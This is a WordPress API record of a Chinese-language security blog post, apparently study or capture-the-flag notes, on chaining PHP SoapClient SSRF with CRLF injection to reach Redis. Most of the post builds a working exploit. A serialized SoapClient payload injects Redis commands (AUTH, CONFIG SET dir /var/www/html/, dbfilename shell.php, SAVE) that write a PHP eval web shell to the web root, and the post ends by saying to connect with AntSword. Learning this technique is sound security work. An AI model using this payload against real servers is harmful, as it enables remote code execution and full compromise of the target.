{"id":69,"date":"2026-03-14T22:34:52","date_gmt":"2026-03-14T14:34:52","guid":{"rendered":"http:\/\/47.118.30.30\/?p=69"},"modified":"2026-03-15T11:40:26","modified_gmt":"2026-03-15T03:40:26","slug":"soapclientssrfcrlf-injectionredis","status":"publish","type":"post","link":"https:\/\/arknight.wiki\/index.php\/2026\/03\/14\/soapclientssrfcrlf-injectionredis\/","title":{"rendered":"SoapClientSSRF+CRLF Injection+Redis"},"content":{"rendered":"<h1>SoapClientSSRF+CRLF Injection+Redis<\/h1>\n<p><a href=\"https:\/\/wooyun.js.org\/drops\/CRLF%20Injection%E6%BC%8F%E6%B4%9E%E7%9A%84%E5%88%A9%E7%94%A8%E4%B8%8E%E5%AE%9E%E4%BE%8B%E5%88%86%E6%9E%90.html\">CRLF Injection\u6f0f\u6d1e\u7684\u5229\u7528\u4e0e\u5b9e\u4f8b\u5206\u6790 &#8211; phith0n<\/a><\/p>\n<p><a href=\"https:\/\/blog.csdn.net\/qq_42181428\/article\/details\/100569464\">\u5229\u7528SoapClient\u7c7b\u8fdb\u884cSSRF+CRLF\u653b\u51fb-CSDN\u535a\u5ba2<\/a><\/p>\n<p><a href=\"https:\/\/xz.aliyun.com\/news\/2640\">soap\u5bfc\u81f4\u7684SSRF-\u5148\u77e5\u793e\u533a<\/a><\/p>\n<h3>SoapClientSSRF\uff1a<\/h3>\n<p>SOAP\uff1awebService\u4e09\u8981\u7d20\uff08SOAP\u3001WSDL\u3001UDDI\uff09\u4e4b\u4e00\uff0c\u00a0SOAP\uff08\u7b80\u5355\u5bf9\u8c61\u8bbf\u95ee\u534f\u8bae\uff09\u662f\u8fde\u63a5\u6216Web\u670d\u52a1\u6216\u5ba2\u6237\u7aef\u548cWeb\u670d\u52a1\u4e4b\u95f4\u7684\u63a5\u53e3\uff0c\u5176\u91c7\u7528HTTP\u4f5c\u4e3a\u5e95\u5c42\u901a\u8baf\u534f\u8bae\uff0cXML\u4f5c\u4e3a\u6570\u636e\u4f20\u9001\u7684\u683c\u5f0f\u3002\u5176\u4e2d\u7684SoapClient\u7c7b\u662f\u7528\u6765\u521b\u5efasoap\u6570\u636e\u62a5\u6587\uff0c\u4e0ewsdl\u63a5\u53e3\u8fdb\u884c\u4ea4\u4e92\u7684\uff0c\u540c\u65f6\u8fd9\u4e2a\u7c7b\u4e0b\u4e5f\u662f\u6709\u53cd\u5e8f\u5217\u5316\u4e2d\u5e38\u5e38\u7528\u5230\u7684__call()\u9b54\u672f\u65b9\u6cd5\u3002\u6240\u4ee5\u53ef\u4ee5\u7406\u89e3\u4e3a\u5f53php\u8c03\u7528\u4e0d\u5b58\u5728\u7684\u65b9\u6cd5\u65f6\uff0c\u81ea\u52a8\u7528soapclient\u53d1\u4e00\u4e2a\u5305\uff0c\u4e14\u6b64\u65f6\u53d1\u5305\u8005\u662f\u670d\u52a1\u5668\u672c\u8eab\uff0c\u7531\u6b64\u6211\u4eec\u4fbf\u6253\u51fa\u4e86\u4e00\u4e2assrf<\/p>\n<p>\u683c\u5f0f\uff1a<\/p>\n<p>&lt;?php<br \/>\n$a = new SoapClient(null, array(&#8216;location&#8217; =&gt; &quot;<a href=\"http:\/\/xxx.xxx.xxx\">http:\/\/xxx.xxx.xxx<\/a>&quot;,<br \/>\n&#8216;uri&#8217;      =&gt; &quot;123&quot;));<br \/>\necho serialize($a);<br \/>\n?&gt;<\/p>\n<p>\u7b2c\u4e00\u4e2a\u53c2\u6570\u662f\u7528\u6765\u6307\u660e\u662f\u5426\u662fwsdl\u6a21\u5f0f\u5229\u7528\u65f6\u8bbe\u7f6e\u4e3anull\uff0c\u7b2c\u4e8c\u4e2a\u53c2\u6570\u4e3a\u4e00\u4e2a\u6570\u7ec4\uff0c\u5982\u679c\u5728wsdl\u6a21\u5f0f\u4e0b\uff0c\u6b64\u53c2\u6570\u53ef\u9009\uff1b\u5982\u679c\u5728\u975ewsdl\u6a21\u5f0f\u4e0b\uff0c\u5219\u5fc5\u987b\u8bbe\u7f6e<code>location<\/code>\u548c<code>uri<\/code>\u9009\u9879\uff0c\u5176\u4e2d<code>location<\/code>\u662f\u8981\u5c06\u8bf7\u6c42\u53d1\u9001\u5230\u7684SOAP\u670d\u52a1\u5668\u7684URL\uff0c\u800curi \u662fSOAP\u670d\u52a1\u7684\u76ee\u6807\u547d\u540d\u7a7a\u95f4\u3002<\/p>\n<h3>CRLF Injection\uff1a<\/h3>\n<p>CRLF\u662f\u201d\u56de\u8f66 + \u6362\u884c\u201d(rn)\u7684\u7b80\u79f0\u3002\u5728HTTP\u534f\u8bae\u4e2d\uff0cHTTP Header\u4e0eHTTP Body\u662f\u7528\u4e24\u4e2aCRLF\u5206\u9694\u7684\uff0c\u6d4f\u89c8\u5668\u5c31\u662f\u6839\u636e\u8fd9\u4e24\u4e2aCRLF\u6765\u53d6\u51faHTTP \u5185\u5bb9\u5e76\u663e\u793a\u51fa\u6765\u3002\u6240\u4ee5\uff0c\u4e00\u65e6\u6211\u4eec\u80fd\u591f\u63a7\u5236HTTP \u6d88\u606f\u5934\u4e2d\u7684\u5b57\u7b26\uff0c\u6ce8\u5165\u4e00\u4e9b\u6076\u610f\u7684\u6362\u884c\uff0c\u8fd9\u6837\u6211\u4eec\u5c31\u80fd\u6ce8\u5165\u4e00\u4e9b\u4f1a\u8bddCookie\u6216\u8005HTML\u4ee3\u7801\u3002<\/p>\n<h3>Redis\uff1a<\/h3>\n<p><strong>Redis\uff08Remote Dictionary Server\uff09<\/strong> \u662f\u4e00\u4e2a\u5f00\u6e90\u7684\u3001<strong>\u57fa\u4e8e\u5185\u5b58\u7684\u952e\u503c\u5b58\u50a8\u7cfb\u7edf<\/strong>\uff0c\u5e38\u88ab\u7528\u4f5c\uff1a\u6570\u636e\u5e93\uff0c\u7f13\u5b58\uff0c\u6d88\u606f\u4e2d\u95f4\u4ef6\u3002<\/p>\n<p>\u4ee5\u4e0b\u662f\u4e00\u4e9b\u6307\u4ee4\uff1a<\/p>\n<pre><code>SET key value [EX seconds] [PX milliseconds]\uff1a\u8bbe\u7f6e key \u7684\u503c\uff08\u53ef\u9009\u8fc7\u671f\u65f6\u95f4\uff09\n\nGET key\uff1a\u83b7\u53d6 key \u7684\u503c\n\nINCR key\uff1a\u5c06 key \u7684\u503c +1\uff08\u5fc5\u987b\u662f\u6574\u6570\uff09\n\nDECR key\uff1a\u5c06 key \u7684\u503c -1\n\nAPPEND key value\uff1a\u8ffd\u52a0\u5b57\u7b26\u4e32\u5230 key \u7684\u503c\u672b\u5c3e\n\nAUTH 20251206\uff1a\u5c1d\u8bd5\u4f7f\u7528\u5bc6\u7801 `20251206` \u8fdb\u884c\u767b\u5f55\n\nCONFIG SET dir \/var\/www\/html\/\uff1a\u5c06\u4fdd\u5b58\u6587\u4ef6\u7684\u76ee\u5f55\u6539\u4e3a\/var\/www\/html\/\n\nCONFIG SET dbfilename shell.php\uff1a\u5c06\u9ed8\u8ba4\u6587\u4ef6\u540ddbfilename\u6539\u4e3ashell.php\n\nSET x '&lt;?= @eval($_POST[1]) ?&gt;'\uff1a\u5c06x\u952e\u7684\u503c\u8bbe\u7f6e\u4e3a'&lt;?= @eval($_POST[1]) ?&gt;'\n\nSAVE\uff1a\u4fdd\u5b58\u6587\u4ef6<\/code><\/pre>\n<p>\u8054\u5408\u4f7f\u7528\uff1a\u5f53\u76ee\u6807\u670d\u52a1\u8c03\u7528\u4e86\u4e0d\u5b58\u5728\u65b9\u6cd5\uff0c\u4e14\u5b58\u5728\u53ef\u63a7SoapClient\uff0c\u4f7f\u7528Redis\u4e14\u5bc6\u7801\u5df2\u77e5\u65f6\uff0c\u6211\u4eec\u53ef\u4ee5\u6253\uff1a<\/p>\n<pre><code>SoapClient(null, array('location' =&gt; \"http:\/\/xxx.xxx.xxx\", 'uri' =&gt; \"hello\"rnAUTH PASSWORDrnCONFIG SET dir \/var\/www\/html\/rnCONFIG SET dbfilename shell.phprnSET x '&lt;?= @eval($_POST[1]) ?&gt;'rnSAVErnhello\");<\/code><\/pre>\n<p>\u4e0a\u4f20\u6728\u9a6c\u7136\u540e\u7528\u8681\u5251\u8fde\u63a5\u3002<\/p>\n","protected":false},"excerpt":{"rendered":"<p>SoapClientSSRF+CRLF Injection+Redis CRLF Injection\u6f0f\u6d1e\u7684\u5229\u7528 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-69","post","type-post","status-publish","format-standard","hentry","category-3"],"_links":{"self":[{"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/posts\/69","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/comments?post=69"}],"version-history":[{"count":1,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/posts\/69\/revisions"}],"predecessor-version":[{"id":100,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/posts\/69\/revisions\/100"}],"wp:attachment":[{"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/media?parent=69"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/categories?post=69"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/tags?post=69"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}